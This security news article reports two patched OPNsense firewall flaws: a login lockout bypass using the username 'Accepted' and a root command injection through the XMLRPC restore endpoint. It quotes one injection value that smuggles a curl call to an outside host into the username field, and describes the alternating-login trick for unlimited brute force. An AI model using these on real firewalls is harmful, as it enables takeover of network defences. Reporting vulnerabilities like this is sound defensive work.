Root RCE and Authentication Lockout Bypass: Public PoC Released for Critical OPNsense Firewall Vulnerabilities
Ddos 
OPNsense, the widely deployed FreeBSD-based firewall and routing platform, has released a critical security update to address two significant vulnerabilities that could allow attackers to bypass security controls and seize total control of the system. The platform, favored by organizations for its “rich feature set of commercial offerings with the benefits of open and verifiable sources,” faces a rare breach in its defensive logic.
The technical details and proof-of-concept (PoC) exploit scripts for both flaws have been publicly disclosed, raising the stakes for administrators who have not yet updated.
The first vulnerability (CVE-2026-44195, CVSS 5.3) involves a clever logic flaw in the lockout_handler. Under normal circumstances, OPNsense tracks failed login attempts and bans offending IPs once a threshold is reached.
However, researchers discovered that the handler erroneously processes “success” keywords like “Accepted” or “Successful login” even if the overall authentication fails. Because the WebGUI log embeds raw, attacker-provided usernames, an attacker can interject a failed login attempt using the username “Accepted”.
According to the disclosure, “The handler evaluates this log line, matches the .*Accepted.* regex first, and erroneously treats the failed login as a successful authentication. This triggers the reset logic, clearing any accumulated failure points for the attacker’s IP”.
By oscillating between a real guess and a “reset” guess, the failure counter never reaches the lockout threshold, allowing for infinite brute-force attempts against both the UI and SSH password logins.
The second (CVE-2026-44193), more severe flaw allows for Remote Code Execution (RCE) with root privileges. The vulnerability resides in the opnsense.restore_config_section method, which fails to sanitize user-supplied input.
The exploit targets a lack of sanitization over CLI parameters in the auth.inc file. An attacker with XMLRPC Library privileges can craft a malicious configuration containing a command injection in the username fieldβfor example:Β Β kch2;curl 192.168.236.1:8000/$(whoami);#.
When the firewall subsequently reloads its services or performs a synchronization, this malicious string is passed directly into a shell command (/usr/sbin/pw). This grants the attacker a remote shell with root access on the firewall host, effectively bypassing all local security measures.
The OPNsense team has moved quickly to patch these flaws. The update addresses the lockout bypass by rearranging the regex evaluation orderβensuring that error entries are checked before “success” matchesβand implements stricter sanitization for the XMLRPC endpoint.
With a functional Python-based PoC for the lockout bypass and documented XML requests for the RCE already circulating in the security community, the OPNsense team recommends that all users upgrade immediately to the patched 26.1.7 release.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
